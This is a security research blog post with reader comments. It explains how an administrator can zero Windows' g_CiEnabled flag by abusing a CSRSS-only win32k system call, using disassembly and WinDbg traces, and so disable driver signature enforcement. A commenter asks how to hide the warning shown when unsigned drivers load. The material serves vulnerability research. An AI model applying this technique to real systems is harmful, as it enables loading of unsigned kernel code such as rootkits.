Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops

To stand by my claim that the Microsoft Windows operating system has been built on the fundamental assumption that administrative privileges would always be equivalent to granting the ability to run arbitrary ring-0 code, I have decided to briefly discuss yet another portion of some Windows internals and how they could be easily misused by a system administrator to unlawfully cross the admin / kernel boundary on a X86-64 platform, and effectively elevate his rights on the machine by loading an unsigned device driver of his choice. The technique is directly related to CSRSS (the infamous Client/Server Runtime Subsystem), a part of Windows that has likely motivated most of the dirty relict hacks in the kernel that still remain visible in the most recent versions of the OS.

As usual, let’s start with some historical context. Back in July 2007, omega_red started a thread on the woodmann RCE forums, stating that he had found a GDI bug (Blue Screen of Death triggerable from user-mode) that required “pretty unusual conditions” to work. A few days into the discussion, Alex Ionescu chimed in and said that inspired by omega’s finding, he had spent a night looking around the win32k.sys module and located four vulnerabilities that he would be willing to present on the BlackHat conference; and so he did – the slides from his BlackHat USA 2008 conference talk titled “Pointer and Handles” can be found here. All issues discussed by Alex are fairly interesting, so be sure to check out the slides if you haven’t already; the important one for us would be the NULL Pointer Dereference within CSRSS.EXE via xxxCreateThreadInfo. The kernel routine would dereference an internal CurrentW32Thread->Desktop pointer without prior sanitization, thus using a pointer that was never initialized for the special subsystem process, in the first place. Oh, in fact there might be a “few more instances of such bugs in the kernel nowadays, but stay tuned… :-)

During his talk, Alex also mentioned a list of CSRSS-reserved system calls within the main graphical device driver, most of which are still found in Windows 7 and 8 today. These services usually begin with the following expression:

if (PsGetCurrentProcess() != gpepCsrss) {
  return STATUS_ACCESS_DENIED;
}

If we take a look at the list of cross-references to the global gpepCsrss symbol in the context of a cmp operation, we will get a comprehensive list of functions that are either entirely reserved for system use, or provide some such functionality (the list below was acquired from Windows 8 32-bit):

_BlockInput
CheckProcessIdentity
_CloseDesktop
_CreateEmptyCursorObject
DestroyProcessesObjects
_GetProcessDefaultLayout
GetThreadsWithPKL
HandleSystemThreadCreationFailure
InitializeClientPfnArrays
IsHandleEntryAccessibleForIL
_LoadCursorsAndIcons
NtUserAutoRotateScreen
NtUserCheckAccessForIntegrityLevel
NtUserCtxDisplayIOCtl
NtUserDestroyCursor
NtUserGetCaretBlinkTime
NtUserGetDoubleClickTime
NtUserHardErrorControl
NtUserNotifyProcessCreate
NtUserPostMessage
NtUserPostThreadMessage
NtUserProcessConnect
NtUserQueryInformationThread
NtUserRemoteConnect
NtUserRemoteRedrawRectangle
NtUserRemoteRedrawScreen
NtUserRemoteStopScreenUpdates
NtUserSetInformationThread
NtUserSetSensorPresence
NtUserSetThreadDesktop
OpenCacheKeyEx
PDEVOBJ::FontManagement
PDEVOBJ::GetTrueTypeFile
_PostMessageCheckIL
_PostMessageExtended
_PostThreadMessage
PowerOnGdi
RecalculateQueueInfo
_RegisterHotKey
RemoteLogoff
RemotePassthruDisable
RemoteShadowCleanup
RemoteShadowStart
RemoteThinwireStats
_SetCursorIconData
_ShouldFrostCrashedWindow
_ShouldFrostSiblingWindow
_ShouldGhostWindow
UnmapDesktop
UserGetDesktopDC
ValidateHwndEx
vCleanupUMWindowlessSprite
VideoPortCalloutThread
WakeRITForShutdown
xxxCreateSystemThreads
xxxCreateThreadInfo
xxxDesktopRecalc
xxxGetDeviceChangeInfo
xxxInitTerminal
xxxInternalKeyEventDirect
xxxInternalUserChangeDisplaySettings
xxxInterSendMsgEx
xxxMouseEventDirect
xxxRealDefWindowProc
xxxRemoteConsoleShadowStop
xxxRemoteDisconnect
xxxRemoteNotify
xxxRemotePassthruEnable
xxxRemoteReconnect
xxxRemoteShadowSetup
xxxRemoteShadowStop
xxxSetDeskWallpaper
xxxSetProcessInitState
xxxSetThreadDesktop
xxxSystemParametersInfo
xxxWrapRealDefWindowProc
zzzClipCursor
zzzResetSharedDesktops

Please note that while CSRSS is a system-critical process, it can be easily executed code within by an administrator – after acquiring a SeDebugPrivilege token, one can use pretty much all process-manipulation API functions (such as WriteProcessMemory or CreateRemoteThread) over the process. Now, the big question is – to what extent do these routines trust CSRSS to provide sensible (and safe) input data? If we look at the past, they seem to have been rather reckless at the time  and didn’t perform any sanity checking at all, as described by Alex from ntinternals.org in the “Windows XP SP2/SP3 (NtUserConsoleControl) – Local Privilege Escalation” article available here. Even though these issues are long gone now after Microsoft has developed adequate fixes (mostly consisting of calling ProbeForRead and ProbeForWrite in the right places), they didn’t really stop indirectly trusting the subsystem process in numerous other places. For example, let’s take a look at the win32k!NtUserSetInformationThread function implementation in snippets:

.text:BF93ED97 call ds:__imp__PsGetCurrentProcess@0 ; PsGetCurrentProcess()
.text:BF93ED9D cmp eax, _gpepCSRSS
.text:BF93EDA3 jnz loc_BFA7E296

First of all, it obviously verifies that the caller is indeed a CSRSS process.

.text:BF93EDA9                 mov     esi, [ebp+length]
.text:BF93EDAC                 cmp     esi, 0Ch
.text:BF93EDAF                 ja      loc_BFA7E2AA
.text:BF93EDB5                 test    esi, esi
.text:BF93EDB7                 jz      loc_BF93EE4D
.text:BF93EDBD                 and     [ebp+ms_exc.disabled], 0
.text:BF93EDC1                 mov     ebx, [ebp+Address]
.text:BF93EDC4                 test    bl, 3
.text:BF93EDC7                 jnz     short loc_BF93EE39
.text:BF93EDC9                 lea     ecx, [ebx+esi]
.text:BF93EDCC                 mov     eax, _W32UserProbeAddress
.text:BF93EDD1                 cmp     ecx, eax
.text:BF93EDD3                 ja      short loc_BF93EE3F
.text:BF93EDD5                 cmp     ecx, ebx
.text:BF93EDD7                 jb      short loc_BF93EE3F
.text:BF93EDD9
.text:BF93EDD9 loc_BF93EDD9:                           ; CODE XREF: NtUserSetInformationThread(x,x,x,x)+EA
.text:BF93EDD9                 push    esi             ; size_t
.text:BF93EDDA                 push    ebx             ; void *
.text:BF93EDDB                 lea     eax, [ebp+local_buffer]
.text:BF93EDDE                 push    eax             ; void *
.text:BF93EDDF                 call    _memcpy
.text:BF93EDE4                 mov     [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:BF93EDEB                 add     esp, 0Ch

Further on, the input data length is enforced to be less or equal to 0ch (12d), after which the data itself is copied into a stack-based buffer located at ebp+var_24. This is not the subject of the post, but please note that there is a bug here already – the routine only checks if the length is not greater than the size of the input structure, but later assumes that it is equal to the size. Therefore, if we pass anything smaller than 12 as the data length (say zero), parts of the buffer will remain uninitialized and later read from – the behavior may consequently lead to a certain degree of information disclosure… Anyway, let’s dig further in the function:

.text:BF93EDEE                 push    esi             ; input data length
.text:BF93EDEF                 lea     eax, [ebp+local_buffer]
.text:BF93EDF2                 push    eax             ; stack-based input buffer of size 12
.text:BF93EDF3                 push    [ebp+cmd_code]  ; fully controlled control code
.text:BF93EDF6                 push    [ebp+handle]    ; input handle
.text:BF93EDF9                 call    _xxxSetInformationThread@16 ; xxxSetInformationThread(x,x,x,x)

There’s a call to an internal win32k!xxxSetInformationThread function with controlled parameters and a pointer to controlled structure. Let’s look inside.

.text:BF93EE6E                 lea     ecx, [ebp+Object]
.text:BF93EE71                 push    ecx             ; Object
.text:BF93EE72                 push    1               ; AccessMode
.text:BF93EE74                 push    dword ptr [eax] ; ObjectType
.text:BF93EE76                 push    20h             ; DesiredAccess
.text:BF93EE78                 push    [ebp+handle]    ; Handle
.text:BF93EE7B                 call    ds:__imp__ObReferenceObjectByHandle@24 ; ObReferenceObjectByHandle(x,x,x,x,x,x)
[...]
.text:BF93EE8B                 mov     ebx, [ebp+buffer]
[...]
.text:BF93EE8F                 mov     edi, [ebp+cmd_code]
[...]
.text:BF93EE9C                 cmp edi, 9
.text:BF93EE9F                 jz short loc_BF93EED6
[...]
.text:BF93EED6 loc_BF93EED6: ; CODE XREF: xxxSetInformationThread(x,x,x,x)+3F
.text:BF93EED6                 add ebx, 4
.text:BF93EED9                 call _xxxRestoreCsrssThreadDesktop@4 ; xxxRestoreCsrssThreadDesktop(x)

What happens here is that the handle parameter from the original syscall is referenced as a thread type, and later if the control code is equal to nine, another internal function called win32k!xxxRestoreCsrssThreadDesktop is invoked with the (buffer+4) address passed as a parameter inside ecx, and the return value of the preeceding ObReferenceObjectByHandle (NTSTATUS) as a parameter in register esi. By following the call chain, we can observe the following code:

.text:BF93EFEF ; __stdcall xxxRestoreCsrssThreadDesktop(x)
[...]
.text:BF93F02C loc_BF93F02C:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+68
.text:BF93F02C                 mov     ecx, [ebx]
.text:BF93F02E                 test    ecx, ecx
.text:BF93F030                 jnz     short loc_BF93F059
.text:BF93F032
.text:BF93F032 loc_BF93F032:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+72
.text:BF93F032                 mov     esi, [ebx+4]
.text:BF93F035                 test    esi, esi
.text:BF93F037                 jz      short loc_BF93F042
.text:BF93F039                 push    edi
.text:BF93F03A                 call    _CloseProtectedHandle@8 ; CloseProtectedHandle(x,x)
.text:BF93F03F                 mov     [ebx+4], edi
.text:BF93F042
.text:BF93F042 loc_BF93F042:                           ; CODE XREF: xxxRestoreCsrssThreadDesktop(x)+48
.text:BF93F042                 mov     eax, [ebp+var_4]
.text:BF93F045                 pop     edi
.text:BF93F046                 pop     esi
.text:BF93F047                 leave
.text:BF93F048                 retn
[...]
.text:BF93F059                 call    ds:__imp_@ObfDereferenceObject@4 ; ObfDereferenceObject(x)
.text:BF93F05F                 mov     [ebx], edi
.text:BF93F061                 jmp     short loc_BF93F032

The above assembly translates to the following:

/* 
 * ... irrelevant ...
 */

if (buffer->object) {
  ObfDereferenceObject(buffer->object);
}
if (buffer->handle) {
  CloseProtectedHandle(buffer->handle);
}

Keeping in mind that buffer is still pointing at a user-controlled structure, it becomes clear that the current implementation enables CSRSS to operate on raw kernel-mode addresses and handles; furthermore, if controlled by a rogue user, it makes it possible to either corrupt kernel-mode memory by passing an arbitrary non-object parameter to ObfDeferenceObject, or potentially cause a use-after-free condition by illegally closing a system handle or passing in a pointer to an object that is not intended to be dereferenced at this point. One simple way to exploit the issue is described below.

The nature of memory operations performed by the ObfDereferenceRoutine routine upon an object is fairly straight-forward:

.text:0045447C                 lea     esi, [ebx-18h]  ; ebx = object
[...]
.text:00454499                 or      edi, 0FFFFFFFFh
.text:0045449C                 lock xadd [esi], edi

Just one thing to keep in mind is that the signed value being decremented by one is not supposed to drop below one; otherwise, the object manager would attempt to free the “object” from the kernel pools which would either render exploitation completely impossible or unnecessarily complicate it by a lot. If we take a step back and look at “A quick insight into the Driver Signature Enforcement” article from two years ago (which was probably around the time I stumbled upon the issue discussed here), we can see that disabling the mechanism on a live system session can be as simple as flipping the nt!g_CiEnabled byte from one to zero. Let’s take a look at our chances  inside a Windows 7 64-bit session investigated with WinDbg:

kd> dq nt!g_cienabled-8
fffff800`02e45eb0  fffff880`00cdc470 00000000`00000001
fffff800`02e45ec0  00000000`00000000 00000000`00000000
fffff800`02e45ed0  00000000`00000000 00000000`00000000
[...]

As we can see, there is a 64-bit pointer directly before the value within interest, and just zeros after it. Bearing in mind that we can’t just decrement a 64-bit value to zero or less explicitly, we need to do some non-aligned memory access. If we take a look at the memory address shifted by one, here’s what we get:

kd> dq nt!g_cienabled-1
fffff800`02e45eb7  00000000`000001ff 00000000`00000000

Our target byte becomes the second-least important byte in a qword, the last one being always 0xff (due to of canonical address space addressing). Therefore, we can perform exactly 256 decrementations using the ObfDereferenceObject call with an arbitrary parameter in order to drop the nt!g_CiEnabled byte to zero and keep the preceeding pointer untouched and valid. This is how it looks in practice:

kd> !process
PROCESS fffffa80020c5b30
    SessionId: 1  Cid: 017c    Peb: 7fffffd9000  ParentCid: 0174
    DirBase: 19e1b000  ObjectTable: fffff8a005fc18e0  HandleCount: 204.
    Image: csrss.exe
[...]
kd> u
nt!ObfDereferenceObject+0x2c:
fffff800`02ca946c f0480fc11f      lock xadd qword ptr [rdi],rbx

kd> ? rbx; dq rdi
Evaluate expression: -1 = ffffffff`ffffffff
fffff800`02e45eb7  00000000`000001ff 00000000`00000000
[...]
kd> ? dq rdi
fffff800`02e45eb7  00000000`000001f8 00000000`00000000
[...]
kd> ? dq rdi
fffff800`02e45eb7  00000000`0000012f 00000000`00000000
[...]
kd> ? dq rdi
fffff800`02e45eb7  00000000`000000ff 00000000`00000000

kd> db nt!g_CiEnabled
fffff800`02e45eb8  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

Aaaaaand… that’s it ;-) Although not very spectacular, you can also watch a demo exploitation video below. I believe I privately reported the bug to Microsoft somewhere around 2009, but it was obviously not classified as a security issue (just a reliability one), and apparently hasn’t been found important enough to be fixed up until now. I hope you guys enjoyed the post, more Windows internals to come soon!

14 thoughts on “Defeating Windows Driver Signature Enforcement #2: CSRSS and thread desktops”

  1. Yeah I enjoyed this post.

    Although this is a mostly uninteresting kind of exploit, I feel that Windows contains tons of place where one could elevate from standard user to system using similar techniques.

    When I scanned the leaked W2k kernel sources I really noticed a lot of unvalidated user-mode arguments and mutation of shared, unsynchronized state. I think it is (or was) a mess.

  2. The nature of memory operations performed by the ObfDereferenceRoutine routine upon an object is fairly straight-forward:

    1. .text:0045447C lea esi, [ebx-18h] ; ebx = object
    2. […]
    3. .text:00454499 or edi, 0FFFFFFFFh
    4. .text:0045449C lock xadd [esi], edi

    Mabey i am utherly rusted but it takes alot of imagination to go from prinout 1 to 4 and assume
    that the function automatically decrement the value by “256” as stated.

    As your trace shown.

    1ff
    1f8 delta: 7
    12f delta: 201
    0ff delta: 48
    000 delta: 255

    Obviously there might be other arcane left to the readers to find
    but if thats the case why don’t you wait for disclosure to actually publish.

  3. when load driver,the Program Compatibility Assistant dialog show,but the driver has loaded success. So why the PCA dialog show and how to fuck this?

  4. @tobi: erm… I don’t think scanning through W2k kernel sources is by any means legal unless you’re a Microsoft employee. Anyway, it’s true that win32k.sys is intensely messy and there’s a lot of fishy action going on there. Perhaps it’s the largest source of local and remote vulnerabilities in the Windows kernel ever. Looking forward to your reporting some of them ;)

    @omeg: hehe ;-)

    @marsh mellow: maybe it’s high time to get some imagination? None of the other readers complained.

    @hello: not sure if I understand correctly, but I assume that you’re referring to the ability to load unsigned drivers while the system is in debug mode (i.e. with windbg attached remotely). Have you tried loading a driver with remote debugging disabled?

  5. “None of the other readers complained” … well im not complaining im just highlighting the fastforward assumption without details.

    I understand you might not want people to recreate it right off the shelf, but if i read something that disclose and issue why not detail it correctly.

    And last time i tried to compile imagination, i couldn’t, lack of memory.

  6. @marsh mellow: really, I think it’s pretty clear what the listing shows (four breaks in random intervals during the process of decrementing the value by one 256 times) based on the context, and let’s stop there.

  7. I mean when I exploit success(aka. nt!g_cienabled has been set to 0), then when I load a unsigned driver, the “Program Compatibility Assistant” dialog appear and says “Windows requires a digitally signed driver…”, of course the driver loaded successfully. but I don’t want the PCA dialog show.

  8. “Perhaps it’s the largest source of local and remote vulnerabilities in the Windows kernel ever.”
    The funny thing is when NT 4.0 was released back in 1996, WinFrame already existed based on NT 3.51 with *per-session* CSRSS, but NT4 TSE was not released until 1998.

Comments are closed.